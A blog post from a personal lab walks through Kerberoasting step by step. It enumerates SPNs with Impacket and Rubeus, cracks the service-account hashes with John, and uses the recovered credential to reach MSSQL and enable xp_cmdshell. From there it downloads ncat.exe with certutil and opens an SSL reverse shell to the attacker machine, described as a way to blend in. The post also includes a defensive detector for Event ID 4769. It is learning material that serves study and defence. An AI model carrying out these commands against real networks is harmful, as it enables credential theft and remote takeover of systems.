Sunday, January 2, 2022

Beginning Kerberoasting

In Kerberoasting, we leverage the fact that a requested service ticket is encrypted with a key derived from the password of the service account the SPN is registered to. The objective is therefore to request a ticket for that service and then crack the service account's password offline, so that the service's credential can be reused.

First up, using the account from the AS-REP Roasting post which was just completed, query the domain for SPNs using impacket-GetUserSPNs.

┌──(root💀securitynik)-[~/packets]
└─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName                     Name              MemberOf  PasswordLastSet             LastLogon                   Delegation 
---------------------------------------  ----------------  --------  --------------------------  --------------------------  ----------
cifs/cifs.securitynik.local              cifs-service                2021-11-10 21:33:08.377237  <never>                                
HTTP/http.securitynik.local:80           http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/http                                http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/http.securitynik.local              http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/www.securitynik.local               kerberos-service            2021-10-22 22:34:26.733216  <never>                                
MSSQLSvc/dc-2019.securitynik.local:1433  sql-service                 2021-11-16 04:58:08.706286  2021-11-16 17:30:56.779153 

Requesting a Service Ticket for the account with MSSQLSvc/dc-2019.securitynik.local:1433.

┌──(root💀securitynik)-[~/packets]
└─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL -request -outputfile GetUserSPNs.hashes

Leveraging Rubeus to grab the tickets instead from a Windows host.

C:\Tools>Rubeus.exe kerberoast /domain:securitynik.local /outfile:kerberoasting.hashes

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : securitynik.local
[*] Searching path 'LDAP://securitynik.local/DC=securitynik,DC=local' for Kerberoastable users

[*] Total kerberoastable users : 4


[*] SamAccountName         : cifs-service
[*] DistinguishedName      : CN=cifs Service,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : cifs/cifs.securitynik.local
[*] PwdLastSet             : 11/11/2021 2:33:08 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : http-spn
[*] DistinguishedName      : CN=HTTP SPN,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : HTTP/http.securitynik.local:80
[*] PwdLastSet             : 11/9/2021 2:32:04 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : kerberos-service
[*] DistinguishedName      : CN=Kerberos Service,CN=Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : HTTP/www.securitynik.local
[*] PwdLastSet             : 10/23/2021 2:34:26 AM
[*] Supported ETypes       : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : sql-service
[*] DistinguishedName      : CN=SERVICE,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : MSSQLSvc/dc-2019.securitynik.local:1433
[*] PwdLastSet             : 11/16/2021 9:58:08 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes

[*] Roasted hashes written to : C:\Tools\kerberoasting.hashes

Now that we have the hashes from two different tools, I will take the ones from impacket-GetUserSPNs and feed them to John.

┌──(root💀securitynik)-[~/packets]
└─# john GetUserSPNs.hashes
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Testing1         (?)
Testing1         (?)
Testing1         (?)
Testing1         (?)
4g 0:00:00:00 DONE 2/3 (2021-11-17 22:18) 50.00g/s 198400p/s 793600c/s 793600C/s Tara1..Smurfy1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

John returned the passwords but I'm not sure why it has the (?).
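Seen from the defender's side, each ticket request above leaves a Windows Security Event ID 4769 (service ticket requested) on the domain controller. The following is an added example, not code from the original post, that flags the pattern those requests produce in constructed 4769 records: one requester, RC4 (0x17) tickets, several distinct user-account services, seconds apart. Field names follow the real 4769 event schema; the window and threshold are assumptions.

```python
"""Added example (not the post's code): flag a Kerberoasting burst in Windows
Security Event ID 4769 records. GetUserSPNs -request / Rubeus kerberoast leave
one 4769 per SPN: same requester, RC4 (0x17) tickets, distinct services, seconds
apart. Sample events are constructed; field names follow the real event schema."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4_HMAC; AES256 is 0x12, AES128 0x11

# Constructed 4769 records (field names follow the real event schema)
SAMPLE_4769 = [
    {"time": "2021-11-17 22:15:01", "TargetUserName": "neysa@SECURITYNIK.LOCAL",
     "ServiceName": "cifs-service", "TicketEncryptionType": "0x17"},
    {"time": "2021-11-17 22:15:01", "TargetUserName": "neysa@SECURITYNIK.LOCAL",
     "ServiceName": "http-spn", "TicketEncryptionType": "0x17"},
    # AES-only service account: the ticket comes back as AES, so it is not counted
    {"time": "2021-11-17 22:15:02", "TargetUserName": "neysa@SECURITYNIK.LOCAL",
     "ServiceName": "kerberos-service", "TicketEncryptionType": "0x12"},
    {"time": "2021-11-17 22:15:02", "TargetUserName": "neysa@SECURITYNIK.LOCAL",
     "ServiceName": "sql-service", "TicketEncryptionType": "0x17"},
    # Benign: a user reaching a host (machine account) and SQL during the day
    {"time": "2021-11-17 09:02:10", "TargetUserName": "alice@SECURITYNIK.LOCAL",
     "ServiceName": "DC-2019$", "TicketEncryptionType": "0x17"},
    {"time": "2021-11-17 14:40:33", "TargetUserName": "alice@SECURITYNIK.LOCAL",
     "ServiceName": "sql-service", "TicketEncryptionType": "0x17"},
]

def is_user_service(service_name):
    # Machine accounts end in '$' and krbtgt is the TGT service; neither is roastable
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"

def find_kerberoast_bursts(events, window=timedelta(minutes=5), min_services=3):
    """Return {requester: [services]} for requesters that obtained RC4 tickets for
    at least min_services distinct user-account services inside one window."""
    per_user = defaultdict(list)
    for e in events:
        if e["TicketEncryptionType"] != RC4_HMAC or not is_user_service(e["ServiceName"]):
            continue
        t = datetime.strptime(e["time"], "%Y-%m-%d %H:%M:%S")
        per_user[e["TargetUserName"]].append((t, e["ServiceName"]))
    findings = {}
    for user, reqs in per_user.items():
        reqs.sort()  # sliding window over time-ordered requests
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                findings[user] = sorted(services)
                break
    return findings
```

The AES-only kerberos-service ticket is deliberately not counted: as the Rubeus notice above says, AES-enabled accounts return AES tickets, which is why moving service accounts to AES-only keys (with long, random passwords) is the corresponding mitigation.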

Next, leverage the password Testing1 with the username sql-service against MSSQLSvc/dc-2019.securitynik.local:1433. We need to target the service being run by that SPN's service account; in this case, the service is MSSQL. Let's leverage the Impacket suite once again, this time using impacket-mssqlclient to target the MSSQL service.

┌──(root💀securitynik)-[~]
└─# impacket-mssqlclient securitynik.local/sql-service:Testing1@10.0.0.5 -windows-auth
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 19162) 
[!] Press help for extra shell commands
SQL> 

Now that we are in, let's get some help.

SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> 

Let's execute enable_xp_cmdshell.

SQL> enable_xp_cmdshell
[*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

Let's now run a few commands.

SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
nt service\mssql$sqlexpress
NULL

Running something more meaningful.

SQL> xp_cmdshell net groups "Domain Admins"
output
--------------------------------------------------------------------------------
Group name     Domain Admins
Comment        Designated administrators of the domain
NULL
Members
NULL
-------------------------------------------------------------------------------
3202357359SA             admin                    Administrator
ANGELINE_WHITAKER        CARMEN_DURAN             DOREEN_MORIN
JACKSON_SOSA             LOUISA_MCPHERSON         MISTY_CALHOUN
mysqlsvc
The command completed successfully.
NULL
NULL

That is all interesting so far. Let's get an ncat shell to come back to my attacking machine.

First up, let's set up a web server to host ncat.exe.

┌──(root💀securitynik)-[~]
└─# cd /home/securitynik/WinTools/

┌──(root💀securitynik)-[~/WinTools]
└─# ls ncat.exe
ncat.exe

┌──(root💀securitynik)-[~/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Using certutil to download ncat.exe.

SQL> xp_cmdshell certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe
output
--------------------------------------------------------------------------------
****  Online  ****
CertUtil: -URLCache command completed successfully.
NULL

Confirming on our attacking machine that the file was successfully downloaded.

┌──(root💀securitynik)-[~/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -
10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -

Next, set up an ncat listener on our attacking machine, allowing only the compromised machine to connect. We are also going to take advantage of SSL to hide our activities while blending in.

┌──(root💀securitynik)-[~]
└─# ncat --verbose --listen 443 -4 --ssl  --allow 10.0.0.5
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F
Ncat: Listening on 0.0.0.0:443

Connecting from the compromised machine.

SQL> xp_cmdshell cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"

Looking at the ncat listener, we now have a shell.

┌──(root💀securitynik)-[~]
└─# ncat --verbose --listen 443 -4 --ssl  --allow 10.0.0.5
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.0.0.5.
Ncat: Connection from 10.0.0.5:64218.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

That is good enough for me. Time to move on. I believe I have improved my knowledge about Kerberoasting.